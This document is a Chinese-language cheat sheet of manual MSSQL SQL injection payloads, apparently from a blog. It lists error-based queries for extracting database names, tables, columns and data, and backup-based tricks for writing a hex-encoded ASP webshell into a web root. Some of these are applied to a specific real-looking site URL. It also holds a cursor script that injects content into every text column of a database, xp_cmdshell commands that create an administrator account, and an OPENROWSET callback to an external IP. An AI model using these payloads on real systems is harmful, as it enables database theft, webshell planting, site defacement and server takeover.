MSSQL手工注入笔记

previous page next page

MSSQL:

■获取数据库名

and db_name()=0 会报错：在将nvarchar 值'test' 转换成数据类型int 时失败。从而得到数据库的名字

and db_name()='master' 通过后面的and条件是否出错来影响查询的执行

and SUBSTRING(DB_NAME(),1,1)='t'

select name from test.dbo.tea where ID=1 and DB_NAME(x)=0 这里x用1，2,3代替即可逐个获取每个数据库的名字

■获取用户名

and user=0

■获取版本信息

and @@version=0

■获取服务器名

and @@servername=0

■获取服务名

and @@servicename=0

■获取系统用户名

and system_user=0

■一次性获取所有基本信息

AnD (dB_NaMe(0)+cHaR(124)+uSeR+cHaR(124)+@@vErSiOn+cHaR(124)+@@sErVeRnAmE+cHaR(124)+@@sErViCeNaMe+cHaR(124)+sYsTeM_UsEr)=0

■一次性探测权限

AnD (cAsT(iS_srvrOlEmEmBeR(0x730079007300610064006d0069006e00)aS vArChAr)+cHaR(94)+cAsT(iS_srvrOlEmEmBeR(0x64006200630072006500610074006f007200)aS vArChAr)+cHaR(94)+cAsT(iS_srvrOlEmEmBeR(0x620075006c006b00610064006d0069006e00)aS vArChAr)+cHaR(94)+cAsT(iS_srvrOlEmEmBeR(0x6400690073006b00610064006d0069006e00)aS vArChAr)+cHaR(94)+cAsT(iS_srvrOlEmEmBeR(0x730065007200760065007200610064006d0069006e00)aS vArChAr)+cHaR(94)+cAsT(iS_mEmBeR (0x7000750062006c0069006300) aS vArChAr)+cHaR(94)+cAsT(iS_mEmBeR (0x640062005f006f0077006e0065007200) aS vArChAr)+cHaR(94)+cAsT(iS_mEmBeR (0x640062005f006200610063006b00750070006f00700065007200610074006f007200) aS vArChAr)+cHaR(94)+cAsT(iS_mEmBeR (0x640062005f006400610074006100770072006900740065007200) aS vArChAr))=0

■获取数据库的数目这里用cast()函数进行了类型转换，以便在后面能够出错

AnD (sElEcT cAsT(cOuNt(1) aS nvArChAr(100))+cHaR(9) FrOm mAsTeR..sYsDaTaBaSeS)=0

■获取数据库文件名

and (select top 1 filename from (select top __i__ filename from master..sysdatabases order by filename) t order by filename desc)=0 <__i__表示单个数字1,2,3>

■同时获取数据库名和数据库文件名

AnD (sElEcT ToP 1 rtrim(iSnUlL(cAsT(nAmE aS nvArChAr(4000)),cHaR(32)))+cHaR(9)+rtrim(iSnUlL(cAsT(filenAmE aS nvArChAr(4000)),cHaR(32)))+cHaR(9) FrOm (sElEcT ToP __i__ nAmE,filenAmE FrOm mAsTeR..sYsDaTaBaSeS oRdEr bY nAmE) t oRdEr bY nAmE dEsC)=0

■获取数据库的表的数目

and (select cast(count(1) as varchar)+char(9) from <数据库名>..sysobjects where xtype=0x75)=0

■获取数据库的表 <一次只能查一个，所以只能not in 逐个>

and (select top 1 name from (select top __i__ name from <数据库名>..sysobjects where xtype=0X75 order by name) t order by name desc)=0

      
        
          
            and (select top 1 name from (select top 1 name from qds114576626_db..sysobjects where xtype=0X75 order by name) t order by name desc)=0
          
        
        
          
            and (select top 1 quotename(name) from qds114576626_db.dbo.sysobjects where xtype=char(85) AND name not in (select top 2 name from qds114576626_db.dbo.sysobjects where xtype=char(85)))=0

and (select top 1 quotename(name) from <数据库名>.dbo.sysobjects where xtype=char(85) AND name not in (select top __i__ name from <数据库名>.dbo.sysobjects where xtype=char(85)))=0

■获取表的字段的数目

and (select cast(count(1) as varchar)+char(9) from <数据库名>..syscolumns where id=object_id('<表名>'))=0

■获取数据库表的字段

and (select top 1 name from (select top __i__ name,id from <数据库名>..syscolumns where id=object_id('<表名>') order by name) t order by name desc)=0

and (select col_name(object_id('<表名>'),__i__))=0 这句要方便一些，通过递增_i_即可，不用先读字段数

■获取满足条件的表的记录数

AnD (sElEcT cAsT(cOuNt(1) aS nvArChAr(100))+cHaR(9) FrOm <数据库名>..<表名>)=0

■获取数据库的内容 <也只能取出多个列的第一个数据>

AnD (sElEcT ToP 1 rtrim(iSnUlL(cAsT(<列名1> aS nvArChAr(4000)),cHaR(32)))+cHaR(9)+rtrim(iSnUlL(cAsT(<列名2> aS nvArChAr(4000)),cHaR(32)))+cHaR(9)+rtrim(iSnUlL(cAsT(<列名3> aS nvArChAr(4000)),cHaR(32)))+cHaR(9) FrOm (sElEcT ToP __i__ <列名1>,<列名2>,<列名3> FrOm <数据库名>..<表名> oRdEr bY <排序列名>) t oRdEr bY <排序列名> dEsC)=0

■基于日志差异备份

        
          
            
              --
              1.
               
              进行初始备份
            
          
          
            
              ;
               
              Alter
               
              Database
               
              TestDB
               
              Set
               
              Recovery
               
              Full
               
              Drop
               
              Table
               ttt 
              Create
               
              Table
               ttt 
              (
              a image
              )
               
              Backup
               
              Log
               
              TestDB
               to disk 
              =
               
              '<临时文件名:e:\wwwroot\m.asp>'
               
              With
               
              Init
              --
            
          
          
            
              --
              2.
               
              插入数据
            
          
          
            
              ;
              Insert
               
              Into
               ttt 
              Values
              (
              0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E
              )--
            
          
          
            
              --
              3.
               
              备份并获得文件，删除临时表
            
          
          
            
              ;
              Backup
               
              Log
               
              <数据库名>
               
              To
               
              Disk
               
              =
               
              '<要生成的文件名:e:\wwwroot\m.asp>'
              ;
              Drop
               
              Table
               ttt 
              Alter
               
              Database
               
              TestDB
               
              Set
               
              Recovery
               SIMPLE
              --

■基于数据库差异备份

        
          
            
              1.
               
              进行差异备份准备工作
            
          
          
            
              ;
              Declare
               
              @a
               
              Sysname
              ;
              Set
               
              @a
              =
              db_name
              ();
              Declare
               
              @file
               
              VarChar
              (
              400
              );
              Set
               
              @file
              =<临时文件名:
              0x633A5C617364662E617370
              >;
              Drop
               
              Table
               ttt 
              Create
               
              Table
               ttt
              (
              c 
              Image
              )
               
              Backup
               
              Database
               
              @a
               
              To
               
              Disk
              =
              @file
              --
            
          
          
            
              2.
               
              将数据写入到数据库
            
          
          
            
              ;
              Insert
               
              Into
               ttt 
              Values
              (
              0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E
              )--
            
          
          
            
              3.
               
              备份数据库并作最后的清理工作
            
          
          
            
              ;
              Declare
               
              @b
               
              SysName
              ;
              Set
               
              @b
              =
              db_name
              ();
              Declare
               
              @file1
               
              VarChar
              (
              400
              );
              Set
               
              @file1
              =<最终需要备份出的文件名:
              0x633A5C617364662E617370
              >;
              Backup
               
              Database
               
              @b
               
              To
               
              Disk
              =
              @file1
               
              With
               
              Differential
              ,
              Format
              ;
              Drop
               
              Table
               ttt
              ;--

      
        
          
            备份数据库
            getshell
          
        
        
          
            http
            :
            //www.swsresearch.com/cn/ViewItem.aspx?table=swwebcontent&id=17637';execute('ins'%2b'ert into test_tmp (a) values (0x3C25657865637574652872657175657374282261222929253EDA);') -- '
          
        
        
          
            http
            :
            //www.swsresearch.com/cn/ViewItem.aspx?table=swwebcontent&id=17637';execute('backup database web1 to disk = ''d:\\m.asp''') -- ' 成功
          
        
        
          
            查看目录
          
        
        
          
            http
            :
            //www.swsresearch.com/cn/ViewItem.aspx?table=swwebcontent&id=17637';execute('sele'%2b'ct convert(int,(se'%2b'lect top 1 subdirectory fr'%2b'om (se'%2b'lect top 3 subdirectory fr'%2b'om D99_Tmp order by subdirectory )K order by subdirectory desc))') -- '

■数据库插马(插指定数据库的指定表的满足条件的记录)

;update <数据库名>..<表名> set <字段名>=<字段名>+'<script>alert("有漏洞啊。")</script>' where <要满足的条件>--

■数据库批量插马(插所有可插入的字段和记录，危险！！请谨慎操作！！)

        
          
            
              ;
              dEcLaRe 
              @t
               vArChAr
              (
              255
              ),
              @c
               vArChAr
              (
              255
              )
               dEcLaRe tAbLe_cursoR cUrSoR 
              FoR
               sElEcT a
              .
              nAmE
              ,
              b
              .
              nAmE 
              FrOm
               sYsObJeCtS a
              ,
              sYsCoLuMnS b wHeRe a
              .
              iD
              =
              b
              .
              iD 
              AnD
               a
              .
              xTyPe
              =
              'u'
               
              AnD
               
              (
              b
              .
              xTyPe
              =
              99
               oR b
              .
              xTyPe
              =
              35
               oR b
              .
              xTyPe
              =
              231
               oR b
              .
              xTyPe
              =
              167
              )
               oPeN tAbLe_cursoR fEtCh next 
              FrOm
               tAbLe_cursoR iNtO 
              @t
              ,
              @c
               
              while
              (@
              @fEtCh_status
              =
              0
              )
               bEgIn exec
              (
              'UpDaTe ['
              +
              @t
              +
              '] sEt ['
              +
              @c
              +
              ']=rtrim(convert(varchar,['
              +
              @c
              +
              ']))+cAsT(<要插入的内容(0x编码形式)> aS vArChAr(200<此处长度应做相应修改>))'
              )
               fEtCh next 
              FrOm
               tAbLe_cursoR iNtO 
              @t
              ,
              @c
               eNd cLoSe tAbLe_cursoR dEAlLoCaTe tAbLe_cursoR
              ;--
            
          
          
            
              ;
              DECLARE 
              @T
               VARCHAR
              (
              255
              ),
              @C
               VARCHAR
              (
              255
              )
               DECLARE 
              Table_Cursor
               CURSOR FOR SELECT a
              .
              name
              ,
              b
              .
              name FROM sysobjects a
              ,
              s yscolumns b WHERE a
              .
              id
              =
              b
              .
              id AND a
              .
              xtype
              =
              'u'
               AND 
              (
              b
              .
              xtype
              =
              99
               OR b
              .
              xtype
              =
              35
               OR b
              .
              xtype
              =
              231
               OR b
              .
              xtype
              =
              167
              )
               OPEN 
              Table_Cursor
               FETCH NEXT FROM 
              Table_Cursor
               INTO 
              @T
              ,
              @C
               WHILE
              (@
              @FETCH_STATUS
              =
              0
              )
               BEGIN EXEC
              (
              'UPDATE ['
              +
              @T
              +
              '] SET ['
              +
              @C
              +
              ']=RTRIM(CONVERT(VARCHAR(4000),['
              +
              @C
              +
              ']))+''<要插入的内容>'''
              )
               FETCH NEXT FROM 
              Table_Cursor
               INTO 
              @T
              ,
              @C
               END CLOSE 
              Table_Cursor
               DEALLOCATE 
              Table_Cursor
              --

■执行命令行(无结果返回)

;exec master..xp_cmdshell 'net user name password /add & net localgroup administrators name /add'--

■恢复存储过程 xp_cmdshell

        
          
            
              ;
              Exec
               
              Master
              ..
              sp_dropextendedproc 
              0x780070005F0063006D0064007300680065006C006C00
              ;
              Exec
               
              Master
              ..
              sp_addextendedproc 
              0x780070005F0063006D0064007300680065006C006C00
              ,
              0x78706C6F6737302E646C6C
              --

■SQLServer 2005 开启和关闭 xp_cmdshell

        
          
            
              ;
              EXEC master
              ..
              sp_configure 
              'show advanced options'
              ,
              1
              ;
              RECONFIGURE
              ;
              EXEC master
              ..
              sp_configure 
              'xp_cmdshell'
              ,
              1
              ;
              RECONFIGURE
              ;
            
          
          
            
              关闭
               xp_cmdshell
            
          
          
            
              ;
              EXEC master
              ..
              sp_configure 
              'show advanced options'
              ,
              1
              ;
              RECONFIGURE
              ;
              EXEC master
              ..
              sp_configure 
              'xp_cmdshell'
              ,
              0
              ;
              RECONFIGURE
              ;

■SQLServer 2005 开启和关闭 OpenDataSource/OpenRowSet

      
        
          
            开启：
          
        
        
          
            ;
            EXEC master
            ..
            sp_configure 
            'show advanced options'
            ,
            1
            ;
            RECONFIGURE
            ;
            EXEC master
            ..
            sp_configure 
            'Ad Hoc Distributed Queries'
            ,
            1
            ;
            RECONFIGURE
            ;
          
        
        
          
            关闭：
          
        
        
          
            ;
            EXEC master
            ..
            sp_configure 
            'show advanced options'
            ,
            1
            ;
            RECONFIGURE
            ;
            EXEC master
            ..
            sp_configure 
            'Ad Hoc Distributed Queries'
            ,
            0
            ;
            RECONFIGURE
            ;

■SQLServer 2005 日志差异备份

        
          
            
              alter database 
              [
              testdb
              ]
               
              set
               recovery full
            
          
          
            
              declare 
              @d
               nvarchar
              (
              4000
              )
               
              set
               
              @d
              =
              0x640062006200610063006B00
               backup database __dbname__ to disk
              =
              @d
               with init
              --
            
          
          
            
              drop table 
              [
              itpro
              ]--
            
          
          
            
              create table 
              [
              itpro
              ]([
              a
              ]
               image
              )--
            
          
          
            
              declare 
              @d
               nvarchar
              (
              4000
              )
               
              set
               
              @d
              =
              0x640062006200610063006B00
               backup log __dbname__ to disk
              =
              @d
               with init
              --
            
          
          
            
              insert into 
              [
              itpro
              ]([
              a
              ])
               values
              (
              __varchar
              (木马内容))--
            
          
          
            
              declare 
              @d
               nvarchar
              (
              4000
              )
               
              set
               
              @d
              =
              __nvarchar
              (文件名)
               backup log __dbname__ to disk
              =
              @d
               with init
              --
            
          
          
            
              drop table 
              [
              itpro
              ]
               declare 
              @d
               nvarchar
              (
              4000
              )
               
              set
               
              @d
              =
              0x640062006200610063006B00
               backup log __dbname__ to disk
              =
              @d
               with init
              --

■通过openrowset查看数据库服务器IP

        
          
            
              NC
              监听
              80
              端口:
              nc 
              -
              vvlp 
              80
               
              (反连看
              IP
              ，自己机器并不一定要有装
              MSSQL
              的)，在注射点上注射如下语句：
            
          
          
            
              ;
              insert into OPENROWSET
              (
              'SQLOLEDB'
              ,
              'uid=sa;pwd=netpatch;Network=DBMSSOCN;Address=58.53.58.32,80;'
              ,
               
              'select * from dest_table'
              )
               select 
              *
               from src_table
              ;--
            
          
          
            
              因为我们只要看
              IP
              ，所以其他的参数就无所谓了。而端口设置成
              80
              ，是为了预防一些机器只让访问外部
              80
              。

previous page start next page